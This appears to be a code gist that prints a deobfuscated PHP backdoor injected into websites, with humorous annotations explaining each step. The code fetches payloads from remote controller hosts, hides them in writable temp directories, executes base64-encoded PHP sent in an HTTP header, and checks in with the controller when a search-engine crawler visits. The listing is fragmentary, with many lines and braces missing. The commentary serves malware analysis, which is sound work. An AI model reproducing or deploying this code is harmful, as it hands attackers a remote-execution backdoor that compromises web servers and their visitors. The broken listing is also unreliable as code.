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Created August 22, 2013 16:17
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// "!defined('determinator') == "include_once" for sneaky people.
if (!defined("determinator")){
function determinator_feof($file_pointer, &$now = NULL) {
// Assigning a value to $now in this function changes
// the value of whatever variable the calling function
// passed in. Functions with side effects... huzzah!
$now = microtime(true);
// Have we reached the end of the file?
return feof($file_pointer);
function getfile($domain, $path){
// Try to change their PHP config to allow file_get_contents to
// grab files via HTTP.
@ini_set('allow_url_fopen', 1);
// If we can use file_get_contents to grab our payload, do that.
if (@ini_get('allow_url_fopen') == '1') {
$file=@file_get_contents('http://' . $domain . $path. '&way=file_get_contents');
return $file;
// Otherwise see if curl is installed and use that instead.
} elseif (function_exists('curl_init')){
$curl_obj = @curl_init();
@curl_setopt($curl_obj, CURLOPT_URL, 'http://' . $domain . $path. '&way=curl';
@curl_setopt($curl_obj, CURLOPT_HEADER,false);
@curl_setopt($curl_obj, CURLOPT_RETURNTRANSFER,true);
@curl_setopt($curl_obj, CURLOPT_CONNECTTIMEOUT, 5);
$file = @curl_exec($curl_obj);
if (empty($file)){
$file = '';
return $file;
// No curl or file_get_contents? *sigh*
// Then just use sockets.
} else {
$socket = @fsockopen($domain, 80, $errno, $errstr, 5);
if ($socket) {
$file = '';
$now = NULL;
@fputs($socket, "GET {$path}&way=socket HTTP/1.0\r\nHost: {$domain}\r\n");
$user_agent = PHP_OS.'/'.PHP_VERSION;
@fputs($socket, "User-Agent: {$user_agent}\r\n\r\n");
// As long as we haven't reached the end of the file
// and checking to see if we've reached the end of the
// file takes less than two milliseconds, read in more
// of the file.
while(!determinator_feof($socket, $now)
&& (microtime(true) - $now) < 2){
$file .= @fgets($socket, 128);
// Remove the response headers and return the file.
$file_parts = explode("\r\n\r\n", $file);
return implode("\r\n\r\n", $file_parts);
// These are the domains we'll be grabbing our payloads from.
$domains = Array('', '', '');
function write($filename,$data){
// Writes data to a file, suppressing any errors with @.
if ($file=@fopen($filename,'w')){
function output($message_type, $message){
// Sends a response to our botnet overlords.
echo 'Y_'.$message_type.':'.$message."\r\n";
// Try to change PHP's config to suppress error messages and
// suppress any resulting error message with @.
@ini_set('display_errors', 0);
// This line works with the first line to allow us to spew our
// vile botnet code all over the victim's files without having to
// worry about it accidentally running twice. It's a sneaky person's
// "include_once" for inline code.
define('determinator', 1);
// Defining some variables we'll be using later.
// Wipe out all $_GET request parameters that contain
// "union" or "select." (Not sure why, but the botnet
// overlords surely have their reasons.)
foreach ($_GET as $arg=>$value){
if (strpos($value,'union')){
} elseif (strpos($value,'select')){
// Try setting the request's URI to our script name and then appending
// the query string to the end of it.
if(!isset($_SERVER['REQUEST_URI'])) {
// Try setting $request_uri to the server's request uri, whether or not
// we were successful in mutating it above. If we succeed in that...
if ($request_uri=$http_host.@$_SERVER['REQUEST_URI']){
// ...then calculate the server's botnet name and find a temp
// directory we can write to!
$tmp_dirs = Array(
foreach ($tmp_dirs as $tmp_dir){
if (!empty($tmp_dir)){
if (@is_writable($tmp_dir)){
$writeable_dir = $tmp_dir;
// We're going to save the payload from our botnet overlords
// as a hidden file in the writeable temp directory we found
// above, naming it after our own botnet name. (Probably because
// that'll make it harder for people to figure out if they're infected.)
// Are our botnet overlords asking for our status?
if (@$_SERVER["HTTP_Y_AUTH"]==$exploited_server_id){
// Tell them what version of the slave code we're running.
echo "\r\n";
@output('versio', $version.'-'.$ftp13.'-php');
// Do they come with commands? Execute them!
if ($command=$base64_decode(@$_SERVER['HTTP_EXECPHP'])){
echo "\r\n";
@output('out', 'ok');
// Our duty is done.
// If we already have a payload file, execute it.
if (@is_file($payload_file)){
// Otherwise check to see if we're being spidered by a search engine.
// If we are, let our botnet overlords know so they can send us a
// payload ASAP. We're mostly interested in websites people will be
// going to, and our botnet overlords seem to think a visit from a
// search engine spider is a pretty good indication that outside
// traffic will be forthcoming.
} else {
$user_agent = @strtolower(@$_SERVER['HTTP_USER_AGENT']);
foreach (explode(',', 'google,yahoo,bing,msnbot,ask,baidu,yandex') as $search_engine){
if (strpos($user_agent, $search_engine)!==False){
if (@touch($payload_file)){
$file_uri = '/pg.php?u='.$request_uri.'&k='.$exploited_server_id.'&t=php&p='.$ftp13.'&v='.$version;
$file_contents = getfile($domains[0], $file_uri);
// Create an empty payload file. We don't want to
// notify our botnet overlords more than once!
// They get grumpy when we do that. D:)
// We don't need to check for the rest of the search
// engine names in the request's HTTP_USER_AGENT once
// we've found one.
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